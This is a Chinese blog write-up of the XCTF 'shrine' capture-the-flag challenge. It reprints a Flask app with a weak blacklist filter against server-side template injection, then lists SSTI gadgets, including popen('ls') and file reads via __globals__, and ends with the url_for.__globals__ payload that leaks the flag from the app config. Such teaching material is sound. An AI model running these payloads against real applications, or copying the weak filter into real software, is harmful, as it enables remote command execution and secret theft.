XCTF shrine wp

这篇博客探讨了一个Python Flask应用中的安全漏洞,具体为Server-Side Template Injection (SSTI)。作者展示了如何利用`url_for`、`current_app`等内部对象访问应用程序配置,特别是`config['FLAG']`来获取隐藏的Flag。通过测试,作者成功执行了代码并揭示了利用SSTI漏洞的多种方法,包括对`__globals__`、`__builtins__`的操纵。博客还列举了一系列与Flask框架和Python编程相关的技术点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入网页发现是个python代码

整理可得

import flask 

import os 

app = flask.Flask(__name__) 

app.config['FLAG'] = os.environ.pop('FLAG') 

@app.route('/') 

def index(): 
return open(__file__).read() 

@app.route('/shrine/') 

def shrine(shrine): 

def safe_jinja(s): 

s = s.replace('(', '').replace(')', '') 

blacklist = ['config', 'self'] 

return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 

return flask.render_template_string(safe_jinja(shrine)) 

if __name__ == '__main__': app.run(debug=True) 

根据代码  百度了解到flask框架 知道这个是flask在/shrine/的SSTI

这里是常用语句

__class__            类的一个内置属性,表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类,返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文,一个全局变量。

request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>

 测试在/shrine/路径下{{1+1}}是否能执行

 成功执行,突破口就在这里了

利用前面的语句url_for.__globals_

 

发现 当前app

url_for.__globals_['current_app'].config  获取当前选定的app下所有配置

即可得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值